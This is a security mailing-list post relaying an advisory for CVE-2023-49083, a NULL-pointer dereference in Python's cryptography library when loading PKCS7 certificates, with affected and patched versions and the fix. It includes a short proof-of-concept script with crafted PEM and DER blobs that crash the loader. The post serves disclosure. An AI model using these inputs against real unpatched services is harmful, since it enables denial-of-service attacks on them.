[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] Python Cryptography advisory: CVE-2023-49083 NULL-dereference when loading PKCS7 cert
From:       Alan Coopersmith <alan.coopersmith () oracle ! com>
Date:       2023-11-29 19:30:39
Message-ID: ea180550-801c-4a6d-b8aa-dee79d76f17a () oracle ! com
[Download RAW message or body]

https://github.com/pyca/cryptography/security/advisories/GHSA-jfhm-5ghh-2f97
reports:

-------------------------------------------------------------------------------
Affected versions >= 3.1, < 41.0.6
Patched versions >=41.0.6

Summary

Calling load_pem_pkcs7_certificates or load_der_pkcs7_certificates could lead to 
a NULL-pointer dereference and segfault.
PoC

Here is a Python code that triggers the issue:

from cryptography.hazmat.primitives.serialization.pkcs7 import 
load_der_pkcs7_certificates, load_pem_pkcs7_certificates

pem_p7 = b"""
-----BEGIN PKCS7-----
MAsGCSqGSIb3DQEHAg==
-----END PKCS7-----
"""

der_p7 = b"\x30\x0B\x06\x09\x2A\x86\x48\x86\xF7\x0D\x01\x07\x02"

load_pem_pkcs7_certificates(pem_p7)
load_der_pkcs7_certificates(der_p7)

Impact

Exploitation of this vulnerability poses a serious risk of Denial of Service 
(DoS) for any application attempting to deserialize a PKCS7 blob/certificate. 
The consequences extend to potential disruptions in system availability and 
stability.

-------------------------------------------------------------------------------

The fix was in https://github.com/pyca/cryptography/pull/9926

-- 
         -Alan Coopersmith-                 alan.coopersmith@oracle.com
          Oracle Solaris Engineering - https://blogs.oracle.com/solaris
[prev in list] [next in list] [prev in thread] [next in thread]